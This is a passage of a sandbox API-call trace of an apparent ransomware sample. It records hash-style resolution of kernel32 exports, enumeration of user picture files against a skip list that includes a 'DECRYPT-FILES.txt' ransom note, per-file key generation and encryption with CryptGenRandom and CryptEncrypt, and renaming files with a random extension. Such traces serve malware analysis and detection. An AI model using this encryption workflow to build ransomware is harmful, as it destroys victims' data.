lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0086.834] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0086.834] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0086.834] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0086.834] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0086.834] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0086.834] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0086.834] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0086.834] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0086.834] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0086.834] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0086.834] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0086.834] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0086.834] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0086.834] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0086.834] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0086.834] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0086.834] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0086.834] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0086.834] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0086.834] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0086.834] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0086.834] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0086.834] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0086.834] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0086.834] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0086.834] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0086.834] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0086.834] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0086.834] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0086.834] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0086.834] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0086.834] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0086.834] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0086.835] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0086.835] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0086.835] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0086.835] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0086.835] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0086.835] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0086.835] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0086.835] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0086.835] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0086.835] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0086.835] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0086.835] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0086.835] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0086.835] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0086.835] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0086.835] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0086.835] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0086.835] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0086.835] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0086.835] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0086.835] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0086.835] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0086.835] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0086.835] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0086.835] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0086.835] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0086.835] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0086.835] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0086.835] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0086.836] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0086.836] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\qlMBzUqCsIPEZTD5JZK.bmp") returned 74 [0086.836] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\qlMBzUqCsIPEZTD5JZK.bmp.SgR63W") returned 81 [0086.836] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\qlMBzUqCsIPEZTD5JZK.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zelljvzmnja\\qlmbzuqcsipeztd5jzk.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\qlMBzUqCsIPEZTD5JZK.bmp.SgR63W" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zelljvzmnja\\qlmbzuqcsipeztd5jzk.bmp.sgr63w"), dwFlags=0x0) returned 1 [0086.837] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.837] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.837] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.837] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4bed3560, ftCreationTime.dwHighDateTime=0x1d4c95f, ftLastAccessTime.dwLowDateTime=0xa3f7b660, ftLastAccessTime.dwHighDateTime=0x1d4caa2, ftLastWriteTime.dwLowDateTime=0xa3f7b660, ftLastWriteTime.dwHighDateTime=0x1d4caa2, nFileSizeHigh=0x0, nFileSizeLow=0xac24, dwReserved0=0x0, dwReserved1=0x0, cFileName="ro76uYb3z.jpg", cAlternateFileName="RO76UY~1.JPG")) returned 1 [0086.837] lstrcmpiW (lpString1="ro76uYb3z.jpg", lpString2="DECRYPT-FILES.txt") returned 1 [0086.837] lstrcmpiW (lpString1="ro76uYb3z.jpg", lpString2="autorun.inf") returned 1 [0086.838] lstrcmpiW (lpString1="ro76uYb3z.jpg", lpString2="boot.ini") returned 1 [0086.838] lstrcmpiW (lpString1="ro76uYb3z.jpg", lpString2="desktop.ini") returned 1 [0086.838] lstrcmpiW (lpString1="ro76uYb3z.jpg", lpString2="ntuser.dat") returned 1 [0086.838] lstrcmpiW (lpString1="ro76uYb3z.jpg", lpString2="iconcache.db") returned 1 [0086.838] lstrcmpiW (lpString1="ro76uYb3z.jpg", lpString2="bootsect.bak") returned 1 [0086.838] lstrcmpiW (lpString1="ro76uYb3z.jpg", lpString2="ntuser.dat.log") returned 1 [0086.838] lstrcmpiW (lpString1="ro76uYb3z.jpg", lpString2="thumbs.db") returned -1 [0086.838] lstrcmpiW (lpString1="ro76uYb3z.jpg", lpString2="Bootfont.bin") returned 1 [0086.838] lstrlenW (lpString="ro76uYb3z.jpg") returned 13 [0086.838] lstrcmpiW (lpString1="jpg", lpString2="lnk") returned -1 [0086.838] lstrcmpiW (lpString1="jpg", lpString2="exe") returned 1 [0086.838] lstrcmpiW (lpString1="jpg", lpString2="sys") returned -1 [0086.838] lstrcmpiW (lpString1="jpg", lpString2="dll") returned 1 [0086.838] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\") returned 51 [0086.838] lstrlenW (lpString="ro76uYb3z.jpg") returned 13 [0086.838] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\" [0086.838] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\", lpString2="ro76uYb3z.jpg" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\ro76uYb3z.jpg") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\ro76uYb3z.jpg" [0086.838] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0086.838] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\ro76uYb3z.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zelljvzmnja\\ro76uyb3z.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0086.839] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=44068) returned 1 [0086.839] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0086.839] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0086.839] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0086.839] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0086.839] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0086.839] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0086.840] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0086.841] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.841] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0086.842] CloseHandle (hObject=0x42c) returned 1 [0086.842] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.842] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0086.842] CloseHandle (hObject=0x0) returned 0 [0086.842] CloseHandle (hObject=0x428) returned 1 [0086.843] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.843] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.843] GetTickCount () returned 0x114e292 [0086.843] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0086.843] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0086.843] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0086.844] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0086.844] lstrlenA (lpString="kernel32.dll") returned 12 [0086.844] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0086.844] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0086.844] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0086.844] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0086.844] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0086.844] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0086.844] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0086.844] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0086.844] lstrlenA (lpString="ADDATOMA") returned 8 [0086.844] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0086.844] lstrlenA (lpString="ADDATOMW") returned 8 [0086.844] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0086.844] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0086.844] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0086.844] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0086.844] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0086.844] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0086.844] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0086.845] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0086.845] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0086.845] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0086.845] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0086.845] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0086.845] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0086.845] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0086.845] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0086.845] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0086.845] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0086.845] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0086.845] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0086.845] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0086.845] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0086.845] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0086.845] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0086.845] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0086.845] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0086.845] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0086.845] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0086.845] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0086.845] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0086.845] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0086.845] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0086.845] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0086.845] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0086.845] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0086.845] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0086.845] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0086.845] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0086.845] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0086.845] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0086.845] lstrlenA (lpString="BACKUPREAD") returned 10 [0086.845] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0086.845] lstrlenA (lpString="BACKUPSEEK") returned 10 [0086.845] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0086.846] lstrlenA (lpString="BACKUPWRITE") returned 11 [0086.846] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0086.846] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0086.846] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0086.846] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0086.846] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0086.846] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0086.846] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0086.846] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0086.846] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0086.846] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0086.846] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0086.846] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0086.846] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0086.846] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0086.846] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0086.846] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0086.846] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0086.846] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0086.846] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0086.846] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0086.846] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0086.846] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0086.846] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0086.846] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0086.846] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0086.846] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0086.846] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0086.846] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0086.846] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0086.846] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0086.846] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0086.846] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0086.846] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0086.846] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0086.846] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0086.847] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0086.847] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0086.847] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0086.847] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0086.847] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0086.847] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0086.847] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0086.847] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0086.847] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0086.847] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0086.847] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0086.847] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0086.847] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0086.847] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0086.847] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0086.847] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0086.847] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0086.847] lstrcpyA (in: 